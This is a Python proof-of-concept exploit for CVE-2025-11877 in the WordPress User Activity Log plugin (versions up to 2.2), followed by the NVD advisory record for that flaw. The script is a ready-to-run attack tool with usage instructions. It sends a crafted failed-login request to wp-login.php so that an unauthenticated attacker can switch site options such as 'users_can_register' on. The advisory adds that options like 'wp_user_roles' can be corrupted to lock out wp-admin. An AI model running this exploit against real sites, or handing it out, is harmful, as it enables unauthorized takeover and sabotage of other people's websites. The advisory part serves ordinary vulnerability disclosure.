CVE-2025-11877

import requests import sys # CVE-2025-11877 PoC - Unauthorized Options Update # Target: WordPress with User Activity Log plugin <= 2.2 def exploit_options_update(target_url, option_name='users_can_register'): """ Exploit the missing capability check in ual_shook_wp_login_failed Allows unauthenticated attackers to toggle site options from 0 to non-zero """ # Target WordPress login endpoint login_url = target_url.rstrip('/') + '/wp-login.php' # Payload: Send failed login with crafted username that triggers option update # The username parameter is directly used in update_option() call payload = { 'log': option_name, # Option name to modify 'pwd': '0', # Any password to trigger failed login 'wp-submit': 'Log In', 'redirect_to': '', 'testcookie': '1' } print(f'[*] Target: {target_url}') print(f'[*] Exploiting CVE-2025-11877...') print(f'[*] Attempting to modify option: {option_name}') try: # Send POST request to trigger failed login handler session = requests.Session() response = session.post(login_url, data=payload, timeout=10) if response.status_code == 200: print(f'[+] Request sent successfully') print(f'[+] Check if {option_name} was modified on the target site') return True except requests.RequestException as e: print(f'[-] Error: {e}') return False if __name__ == '__main__': if len(sys.argv) < 2: print(f'Usage: python {sys.argv[0]} <target_url>') print(f'Example: python {sys.argv[0]} http://target.com') sys.exit(1) target = sys.argv[1] exploit_options_update(target)

{"cve": {"id": "CVE-2025-11877", "sourceIdentifier": "[email protected]", "published": "2026-01-07T12:16:46.400", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The User Activity Log plugin is vulnerable to a limited options update in versions up to, and including, 2.2. The failed-login handler 'ual_shook_wp_login_failed' lacks a capability check and writes failed usernames directly into update_option() calls. This makes it possible for unauthenticated attackers to push select site options from 0 to a non-zero value, allowing them to reopen registration or corrupt options like 'wp_user_roles', breaking wp-admin access. CVE-2025-13471 appears to be a duplicate of this CVE."}, {"lang": "es", "value": "El plugin User Activity Log es vulnerable a una actualización limitada de opciones en versiones hasta la 2.2, inclusive. El manejador de inicios de sesión fallidos 'ual_shook_wp_login_failed' carece de una verificación de capacidad y escribe los nombres de usuario fallidos directamente en las llamadas a update_option(). Esto permite a atacantes no autenticados empujar opciones de sitio seleccionadas de 0 a un valor distinto de cero, permitiéndoles reabrir el registro o corromper opciones como 'wp_user_roles', rompiendo el acceso a wp-admin."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/user-activity-log/trunk/user-functions.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/24225f47-cec2-4270-88f0-8696ebfb7168?source=cve", "source": "[email protected]"}]}}